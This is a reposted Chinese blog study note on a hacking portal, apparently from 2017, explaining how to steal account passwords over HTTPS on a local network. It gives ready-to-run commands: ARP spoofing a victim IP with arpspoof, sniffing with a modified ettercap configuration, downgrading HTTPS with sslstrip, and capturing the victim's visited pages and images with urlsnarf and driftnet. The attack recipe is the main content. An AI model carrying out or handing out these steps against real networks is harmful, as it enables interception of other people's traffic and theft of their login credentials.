黑基网 首页 学院 网络安全 查看内容

黑客是如何通过分析HTTPS协议获取账号和密码的?

2017-8-5 00:44| 投稿: xiaotiger |来自: 互联网

摘要: 注意:这是我在“某书”上的学习笔记,我在“某书”上还有其他的笔记,看情况随机分享。若有网友需要全部的学习笔记,去“某书”上搜索我就可以,我叫FKTX如果用arpspoof配合ettercap只能获得http协议下的相关账号密 ...

注意:这是我在“某书”上的学习笔记,我在“某书”上还有其他的笔记,看情况随机分享。若有网友需要全部的学习笔记,去“某书”上搜索我就可以,我叫FKTX

如果用arpspoof配合ettercap只能获得http协议下的相关账号密码。但是,现在普遍https协议,那么这种方法就GG了。


首先,由于默认的ettercap只能嗅探http协议下的密码,所以,若进行https协议下的嗅探,那么,就要对ettercap配置文件做一些修改。

路径:

/etc/ettercap/etter.conf

去掉注释,让命令生效就可以了。同时保存退出。

然后,用arpspoof配合ettercap以及sslstrip就可以获得https下的密码。

补充:sslstrip是一款可以将https还原成http的工具。

命令:

arpspoof -t 192.168.1.130 192.168.1.1 -i eth0 进行欺骗

ettercap -Tq -i eth0 进行嗅探

sslstrip -a -f -k

注意:并不是每次都能成功抓到用户名密码,同时,推荐给kali装一个usb外置网卡,否则,在做实验的时候总会遇到各种坑!这些坑是新手不容易跨过的!因为虚拟机毕竟只是虚拟机!同时,防火墙、杀毒软件是否也会影响实验效果?有待考量。

最后,补充一下kali中几个和本次实验相关的工具,以及使用方法:

urlsnarf -i eth0

在成功的ARP欺骗后,可以利用这个命令抓取流量,看目标浏览了哪些网页。

driftnet -i eth0

同理,在arp欺骗成功后,可以从网卡中抓取目标浏览的图片,但是只能是图片,而且还有一个缺陷,那就是不是所有的图片都能抓到。

其他文章链接:

黑客技术:简单几步轻松获取别人账号密码

渗透黑客必会知识:数据库基础——数据表的操作

我不会再花精力去配图写黑客文章了,那是在浪费时间!附:mysql学习笔记

企业漏洞扫描工具,功能很强大!不知道黑客用的漏扫是否同样强大?

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:http://www.toutiao.com/a6446507398168510734/

免责声明:本文搜集整理自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,请我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部